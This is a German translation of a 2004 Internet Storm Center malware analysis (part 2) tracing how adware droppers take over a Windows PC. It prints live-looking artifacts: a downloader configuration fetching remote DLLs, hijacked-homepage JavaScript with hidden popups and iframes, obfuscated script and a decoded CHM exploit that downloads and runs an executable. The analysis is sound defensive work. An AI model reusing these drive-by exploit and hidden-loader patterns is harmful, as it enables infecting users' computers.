Schädlingen auf der Spur, Teil 2

26.08.2004 11:35 Uhr Jürgen Schmidt

Ein sorgloser Klick und schon mutierte Otto Normalos PC in einen P.A.L. -- einen "PC Anderer Leute". Tom Liston beschreibt, wie die heimlich installierten Software-Pakete nach und nach das Kommando übernehmen.

Dies ist ein Tagebucheintrag des Diensthabenden im Internet Storm Center [1]. heise Security veröffentlicht die deutsche Übersetzung mit freundlicher Genehmigung des ISC und des Autors Tom Liston. Das Original finden Sie hier [2].

Achtung: Die Links in diesem Artikel lassen sich absichtlich nicht anklicken. BESUCHEN SIE DIESE SEITEN NICHT. SIE SIND GEMEINT. ECHT. Einige Leser berichten, dass ihre Antiviren-Software sogar beim Öffnen dieses Artikels Alarm schlägt. Dieser Fehlalarm bezieht sich auf die abgedruckten Listing-Teile und kann ignoriert werden. Um weitere Fehlalarme zu vermeiden, wurde an einigen Stellen "<>" durch "[]" ersetzt.

Willkommen zum zweiten Teil unserer Reise durch die dunklen Ecken des Internet. Bei allen, die nach dem ersten ungeduldig auf die Fortsetzung gewartet haben, möchte ich mich entschuldigen, dass es so lange gedauert hat, das alles zusammenzustellen. Falls Sie den ersten Teil verpasst haben oder noch mal kurz nachlesen wollen, um was es ging, finden Sie ihn hier:

http://heise.de/-245140 [3]

Lassen Sie sich ruhig Zeit ... ich warte.

Fertig? Gut.

Als wir unseren unerschrockenen "Otto Normalo" verließen, hatte er ein neues Windows XP Home installiert und sich auf die Suche nach Spaß und Abenteuer ins Internet begeben. Jemand hatte ihm von Yahoo! Games erzählt, die er mal ausprobieren wollte. Über Google landete er auf der Seite www.yahoogamez.com. Ab da ging es rund.

Über einen IFRAME mit einen CHM-Exploit wurde Ottos nagelneuer Computer in etwas neues verwandelt -- etwas was er sich nie hätte träumen lassen: einen P.A.L. -- einen "PC Anderer Leute"

Wie bitte?

Naja, obwohl der PC noch Otto gehört ("owned" mit "o") und er die Ehre hat, ihn mit Strom und einer Internet-Verbindung zu versorgen, kontrollieren ihn andere ("0wned" mit Null). Und die lassen die schöne Hardware nach IHRER Pfeife tanzen.

Otto will eigentlich nur in aller Ruhe eine Runde "Donut Boy 2" von der yahoogamez-Seite spielen, doch die netten kleinen Freunde, die er sich dort eingefangen hat, haben anderes im Sinn. Am Ende von Teil 1 hatte sich Folgendes auf Ottos PC geändert:

Ottos Startseite wurde geändert. Sie zeigt jetzt auf:
http://default-homepage-network.com/start.cgi?new-hkcu
Die Standardsuchseite wurde umgebogen:
http://server224.smartbotpro.net/7search/?new-hkcu
Der Suchassistent wurde abgeschaltet
"TV Media Display" wurde auf dem PC installiert (mehr dazu später).
addictivetechnologies.net hat Ottos System mit einer Datei beglückt, die Antiviren-Software als Win32/TrojanDownloader.Rameh.C identifiziert.

Was führen Ottos neue Freunde wohl weiter im Schilde? Lassen Sie uns den Spuren weiter folgen und als Erstes mal die Datei näher untersuchen, die Otto von Addictive Technologies "bekommen" hat. Das war eine.cab-Datei mit dem Namen "fr03tp.cab,", die zwei Dateien enthielt:

ATPartners.inf - 403 bytes
ATPartners.dll - 96,256 bytes

(Ein kleiner Kommentar: ATPartners.dll enthält eine statisch gelinkte Kopie der MSVC-Runtime-Umgebung. Das ist komplett unnütz. Addictive Technologies: Wenn ihr schon Schädlinge schreibt -- schreibt sie wenigstens EFFIZIENT.)

Wenn wir die Strings in der DLL-Datei untersuchen, stoßen wir auf recht interessante Dinge:

/F1/Cmd4F1_fr03t.txt
www.f1organizer.com
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
 Browser Helper Objects

und auch auf einige ziemlich seltsame:

Hara Hara Mahadev !!!
tum agar badshah hai to hum eespeek ka yekka!

(Kann mich da jemand aufklären?)

Stellen wir die ersten Teile dieser Liste richtig zusammen, ergibt sich die URL

http://www.f1organizer.com/F1/Cmd4F1_fr03t.txt

unter der wir eine interessante Datei finden:

[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[AddF1]
Folder=AT-Games
Link=http://www.gamehouse.com/affiliates/template.jsp?AID=2226
Name=Gamehouse Games

[AddF2]
Folder=AT-Games
Link=http://www.regnow.com/softsell/
 visitor.cgi?affiliate=24998&action=site&vendor=7551
Name=Big Fish Games

[AddF3]
Folder=AT-Games
Link=http://www.regnow.com/softsell/
 visitor.cgi?affiliate=24998&action=site&vendor=7834
Name=FlyorDie Games

[AddF4]
Folder=..\\Desktop\\
Link=http://www.007arcadegames.com
Name=007arcadegames.com
IconFile=http://www.007arcadegames.com/007.ico
IconIndex=0

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/ezbdlLs.dll
InstallName1=bdlds.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server2=www.AddictiveTechnologies.net
Object2=/LoadShare/SplWbr.dll
InstallName2=SplWbr.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4SB2.htm

(Geht es nur mir so oder finden auch andere den Ausdruck "softsell" in den RegNow-URLs mehr als amüsant?)

Sieh an! Da wurde noch mehr auf Ottos Rechner "aktualisiert". Ok, untersuchen wir das mal genauer: Die fügen einige Links in Ottos Internet-Favoriten ein, um Online-Game-Shops zu fördern, auf denen AT Provisionen kassiert (Gamehouse Games, Big Fish Games and FlyorDie Games). Auf Ottos Desktop haben sie einen Link zu "007arcadegames," angelegt und sie laden auch gleich noch ein paar Geschenke für Otto herunter: ezbdlLs.dll und SplWbr.dll.

SplWbr.dll hat ein Kampfgewicht von stolzen 454.656 Bytes. Es ist das, was man in der Antivirus-Branche als "File Dropper" bezeichnet: Wenn man ihn ausführt, installiert er eine oder mehrere Dateien, die als Daten angehängt sind. In diesem Fall spuckt er zwei Dateien aus.

Datei #1 -- 135.088 Bytes, die behaupten, sie wären ein "Ad Destroyer and Virtual Bouncer Installation" (Bouncer: Türsteher, Rausschmeißer). Das Ganze ist digital signiert von Spyware Labs, Inc. (www.spywarelabs.com).

Datei #2 -- 302.544 Bytes, die still und leise "TopRebates.com AutoTrack software" installieren. (www.toprebates.com).

ezbdlLs.dll ist eine 151.040-Byte-große, UPX-komprimierte DLL, die sich ausgepackt auf 176.128 Bytes aufbläht. Auch diese Datei ist ein File Dropper mit drei neuen Gaben für Ottos PC:

Datei #1 -- 65.536 Bytes ASPack-komprimierter Güte von www.abetterinternet.com, die sich als ein "Werkzeug für das Herunterladen von Dateien und das Aktualisieren von Software" präsentieren.

Datei #2 -- 33.280 Bytes UPX-gepackter Freude, die sich in 65.536 Byte Schrott-Software der netten Leute von ezULA (www.ezula.com) verwandeln. Die behaupten, sie möchten "Ihr Surfen im Internet einfach, aufregend und persönlich gestalten". Ähhh -- nein danke, lieber nicht.

Datei #3 -- 65.024 Bytes mit einem NullSoft-Installer, der Ottos System mit SAHAgent beglückt. Das ist ein Winsock2 Layered Service Provider (LSP), der sich in Ottos WinSock-Stack einklinkt -- ähnlich wie eine Personal Firewall. SAHAgent leitet ausgewählten Web-Verkehr so um, dass die Provisionen für Ottos zukünftige Online-Anschaffungen an eine bestimmte Partner-ID fließen.

Und was ist jetzt das Ergebnis dieses ganzen Durcheinanders? Otto hat jetzt fünf neue Software-Pakete installiert, die seinen Browser, seine Suchanfragen und seine Online-Geschäfte so umleiten, dass sie den (zweifellos ;-) aufrechten, netten Leuten by ATPartners in den Kram passen. Das Surfen im Internet wird zukünftig "einfach, aufregend und persönlich" (ezula), er weiß: "die besten Downloads sind kostenlos" (abetterinternet), sein Rechner zeigt ihm "klevere Tricks, Geld einzustecken" (TopRebates) und er braucht sich keine Sorgen über Adware/Spyware mehr zu machen, weil die ja der Virtual Bouncer ... äh ... draußen hält (Spyware Labs). Ach ja, noch was: Seine Online-Einkäufe bringen Geld -- irgendjemanden jedenfalls (SAHAgent). Otto sollte sich wirklich glücklich schätzen.

Aber haben Sie DIESEN Teil in der Textdatei mit den Anweisungen bemerkt, die sich ATPartners.dll nachgeladen hat?

[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

Das nächste Mal werden also andere Anweisungen nachgeladen:

[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/msbb693.dll
InstallName1=msbb321.dll
RepURL1=
http://www.f1organizer.com/F1/audit/Ack/Ack4F1_nCase321.htm

Server2=www.f1organizer.com
Object2=/F1/objects/ezbdlLs.dll
InstallName2=bdlds.dll
RepURL2=
http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server3=www.f1organizer.com
Object3=/F1/objects/W2020Setup.dll
InstallName3=W2020Setup.dll
RepURL3=
http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server4=www.f1organizer.com
Object4=/F1/objects/MyDailyHoroscope.dll
InstallName4=MyDailyHoroscope.dll
RepURL4=
http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-4=www.f1organizer.com
Object-4=/F1/objects/ezStD.dll
InstallName-4=ezStub3.dll
RepURL-4=
http://www.f1organizer.com/F1/audit/Ack/Syn4F1_eZula.htm

Server-6=www.f1organizer.com
Object-6=/F1/objects/MoreResultsSetup.dll
InstallName-6=MoreResultsSetup.dll
RepURL-6=
http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-3=www.f1organizer.com
Object-3=/F1/objects/KVIF_11.dll
InstallName-3=KVIF_11.dll
RepURL-3=
http://www.f1organizer.com/F1/audit/Ack/Syn4F1_KVI.htm

Allein vom Ansehen dieser Liste wird mir schlecht. (Auch wenn ich über den Begriff "ezStD" lachen musste. Für diejenigen, die kein Englisch sprechen: STD ist eine Abkürzung für "Sexually Transmitted Disease" -- Geschlechtskrankheiten :-) Natürlich könnte ich diesen Misthaufen auch noch auseinander klamüsern -- aber jetzt werden wir uns erst mal einen anderen Bereich ansehen, den Otto nicht mehr kontrolliert: seine Startseite.

Ottos Startseite

Ottos Startseite wurde beim ersten Besuch auf

"http://default-homepage-network.com/start.cgi?new-hkcu".

umgesetzt. Beim nächsten Start des Internet Explorer lädt er Folgendes:

<html><head>
<title>Default Homepage Network</title>
</head>
<body>
[script language=javascript]
<!--
 var agt=navigator.userAgent.toLowerCase();
 var is_ie   = (agt.indexOf("msie") != -1);
 var is_aol   = (agt.indexOf("aol") != -1);
if (!is_aol) {
 self.moveTo(0,0);
 self.resizeTo(screen.availWidth,screen.availHeight);
}
location.href=
 "http://default-homepage-network.com/newspynotice.html"
if (!is_aol) {
 var expdate = new Date((new Date()).getTime() + 600000);
 if (document.cookie.indexOf("delayed") == -1) {
  document.cookie=
    "delayed=general; expires=" +
    expdate.toGMTString() +
    "; path=/;";
  splashWin2 = window.open("",'y','fullscreen=1,\
    toolbar=0,location=0,directories=0,\
    status=0,menubar=0,scrollbars=0,resizable=0');
  splashWin2.blur();
  window.focus();
  splashWin2.resizeTo(10,10);
  splashWin2.moveTo(5000,5000);
  splashWin2.location=
   "http://object.passthison.com/aff/delayed/";
  window.focus();
 }
}
//-->
[/script]</body>

Hinter dem Verweis auf "newspynotice.html," verbirgt sich ein weiteres Juwel. Er zeigt ein großes, rotes Stoppschild und behauptet, dass der Rechner möglicherweise mit Spyware infiziert sei. Ob Otto denn bemerkt habe, dass sich seine Homepage geändert hat? Hat sich sein Rechner in letzter Zeit "koimsch" verhalten? (Warum können diese Malware-Clowns nichtmal richtig schreiben?) Ist das Internet "langsam oder stürzt ab"? Wenn ja, muss Otto nur auf einen Link auf dieser Seite klicken und sein Rechner "ist in wenigen Minuten wieder sauber und sicher". Da kommt Freude auf.

Im HTML-Code, der diesen "WICHTIGEN SICHERHEITSHINWEIS" präsentiert, ist eine kleine Überraschung versteckt:

<!-- 1. newobj1 -->

[script type="text/javascript"]
document.write('\u003c\u0073\u0063\u0072\u0069\u0070
...
\u0074\u003e')[/script]

<!-- 2. e1 -->

[script type="text/javascript"]
document.write('\u003c\u0069\u0066\u0072\u0061\u006d
...
\u0066\u0072\u0061\u006d\u0065\u003e')[/script]

Dekodiert ergibt der erste Teil:

[script language=javascript]
var oPopup = window.createPopup();
function showPopup() {     
 oPopup.document.body.innerHTML =
  "<object
   data=http://object.passthison.com/vu083003/newobject1.cgi\>";
  oPopup.show(0,0,1,1,document.body);
}
showPopup();
[/script]

Und Teil 2:

[iframe
 src="http://69.50.139.61/hp1/hp1.htm" width=1 height=1]
[/iframe]

Das erinnert an die Datei hp2.htm, die im ersten Teil dieses epischen Abenteuers geladen wurde. Dieselbe Site, dieselbe Methode und das Gleiche Resultat:

<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. 
 (c) April 2004 SmartBot -->[script type="text/javascript"]
document.write('\u003c\u0074\u0065\u0078\u0074\u0061
...
\u000d\u000a\u000d\u000a')[/script]

Auch das ist nicht schwer zu dekodieren und ergibt:

<textarea id="code" 
 style="display:none;">
[object 
 data="ms-its:mhtml:\
 file://C:\foo.mht!${PATH}/HP1.CHM::/hp1.htm"
 type="text/x-scriptlet"]
[/object]
</textarea>
[script language="javascript"]
 document.write(\
 code.value.replace(/\${PATH}/g,location.href.substring\
 (0,location.href.indexOf('hp1.htm'))));
[/script]

Wieder ein CHM-Exploit, der eine Datei namens hp1.exe herunterlädt und ausführt. Damit geht es wieder von vorne los – und glauben Sie mir: hp1.exe ist ein schweres Stück Arbeit. Bleiben Sie dran für Teil 3.

Anmerkung: Als ich begann, das alles zusammenzuschreiben, hatte ich keine Ahnung, wie tief dieses Kaninchenloch hinabführt. Ich glaubte wirklich, das gäbe nur einen etwas längeren Tagebucheintrag ... dann wurden es zwei ziemlich lange ... und jetzt ist klar, dass es doch drei werden -- mindestens. Aber ich werde versuchen den dritten Teil (und alle weiteren) schneller fertig zu bekommen.

http://www.labreatechnologies.com [4]

Hier gehts zu: Schädlingen auf der Spur, Teil 3 [5] (ju [6])

URL dieses Artikels:
https://www.heise.de/-270560

Links in diesem Artikel:
[1] http://isc.incidents.org/
[2] http://isc.incidents.org/diary.php?date=2004-08-23
[3] https://www.heise.de/hintergrund/Schaedlingen-auf-der-Spur-270540.html
[4] http://www.labreatechnologies.com/
[5] https://www.heise.de/hintergrund/Schaedlingen-auf-der-Spur-Teil-3-270594.html
[6] mailto:ju@ct.de